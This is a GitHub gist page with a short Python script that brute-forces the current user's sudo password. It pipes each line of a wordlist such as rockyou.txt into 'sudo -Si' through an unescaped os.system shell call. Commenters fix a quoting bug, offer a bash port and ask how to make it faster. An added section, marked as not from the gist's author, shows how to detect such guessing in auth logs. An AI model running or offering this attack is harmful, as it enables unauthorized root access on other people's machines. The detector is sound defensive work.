@ramuta
Last active April 8, 2024 05:12
A Python script to brute force the sudo password of a current user.
# Author: Matej Ramuta
# How to use this script:
# 1. You need to have a wordlist file, something like rockyou.txt
# 2. Make sure you have Python 3 installed. Try this with "python --version" command. Also check "python3 --version"
# 3. Run the script like this: python sudo_brute_force.py passwords.txt
import os
import sys

if len(sys.argv) == 1:
    print("You need to add a wordlist! Run the script like this: python sudo_brute_force.py passwords.txt")
    exit()

wordfile = sys.argv[1]

print("Brute force sudo password with wordlist {}".format(wordfile))
print()

with open(wordfile, "r") as wordlist:
    for password in wordlist:
        print(password)
        result = os.system("echo '{}' | sudo -Si".format(password.strip()))  # important: strip() the newline char
        if result == "0" or result == 0:
            print("Success! :) The password is: {}".format(password))
            break
        else:
            print("Wrong password... :( Let's try again!")
            print()
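
For the defender's side of the script above, an added example (not part of the gist and not written by its author): every wrong guess makes sudo log an "incorrect password attempt" entry, so a burst of them from one account stands out in the auth log. The log lines are constructed samples in the traditional syslog format, and the function name, threshold, window and year parameter are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (assumed traditional syslog format, e.g. /var/log/auth.log).
SAMPLE_LOG = """\
Jan 16 10:15:01 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:15:03 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:15:05 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:15:07 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:15:09 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:15:11 host1 sudo:    alice : 1 incorrect password attempt ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jan 16 10:20:00 host1 sudo:      bob : 3 incorrect password attempts ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt update
Jan 16 10:21:00 host1 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Matches sudo's failure record: "<user> : <n> incorrect password attempt(s) ;"
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo(?:\[\d+\])?:\s+(?P<user>\S+) : "
    r"(?P<n>\d+) incorrect password attempts? ;"
)


def find_sudo_guessing(log_text, threshold=5, window_s=60, year=2020):
    """Return {user: time at which failed sudo attempts inside a sliding
    window of window_s seconds first reached threshold}."""
    recent = defaultdict(deque)  # user -> (timestamp, attempts) still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue  # successful sudo runs and unrelated lines are ignored
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["user"]]
        q.append((ts, int(m["n"])))
        while ts - q[0][0] > timedelta(seconds=window_s):
            q.popleft()  # drop failures that fell out of the window
        if sum(n for _, n in q) >= threshold and m["user"] not in alerts:
            alerts[m["user"]] = ts
    return alerts


if __name__ == "__main__":
    for user, when in find_sudo_guessing(SAMPLE_LOG).items():
        print(f"possible sudo password guessing by {user} at {when}")
```

A single mistyped password session (bob's three attempts) stays below the default threshold, while alice's rapid sequence of one-attempt failures triggers an alert.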
@ramuta
Author

ramuta commented Jan 16, 2020

Weird behavior: if a password starts with # (or maybe #1?), the script thinks it's the correct one, even though it's not.

EDIT: This is fixed now with single quotes around password in line 23.

@Nielzo-ai

by me is the password 97885742334

@medanisjbara

To those who are interested, I wrote a translation in bash here

@jedai47

jedai47 commented Nov 11, 2021

it did not work for me as it took the second password in the wordlist as command ...

@Jonah1Pablow

faisalqureshi6156

@medanisjbara

medanisjbara commented Jul 31, 2022

@ramuta 2 years late. But if a password starts with # then the command becomes just echo with the rest being just a comment. Therefore the exit status will be 0. Effectively making your script think the password is correct while it's not.

A good way to solve this is to have two single quotes around the curly brackets. So line 23 should become:

        result = os.system("echo '{}' | sudo -Si".format(password.strip()))

@ramuta
Author

ramuta commented Sep 26, 2022

> @ramuta 2 years late. But if a password starts with # then the command becomes just echo with the rest being just a comment. Therefore the exit status will be 0. Effectively making your script thinks the password is correct while.
>
> A good way to solve this is to have two single quotes around the curly brackets. So line 23 should become.
>
>     result = os.system("echo '{}' | sudo -Si".format(password.strip()))

Thanks @medanisjbara, not sure how I missed this 🤦‍♂️ 😄

@trawn3333

Does anyone have this working on systems that institute a delay on sudo commands? It doesn't seem to work for me in Ubuntu.

@medanisjbara

@trawn3333 there are better ways to do this if you forgot your password. But hit me up if you still want this.

@IloveTurtles1

is there any way to make it run faster?
